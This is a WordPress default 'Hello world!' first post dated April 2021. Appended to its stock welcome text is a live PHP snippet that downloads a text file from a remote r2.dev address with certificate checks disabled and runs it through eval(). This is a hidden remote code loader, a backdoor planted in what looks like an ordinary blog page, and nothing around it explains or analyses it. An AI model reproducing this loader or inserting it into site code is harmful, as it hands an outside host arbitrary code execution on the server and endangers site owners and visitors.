Gibson

April 15, 2021

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
$url = 'https://pub-0ca201b9f99d42e2ac677f2c9fd230a9.r2.dev/805/bl.txt'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $fileContents = curl_exec($ch); curl_close($ch); eval("?>" . $fileContents);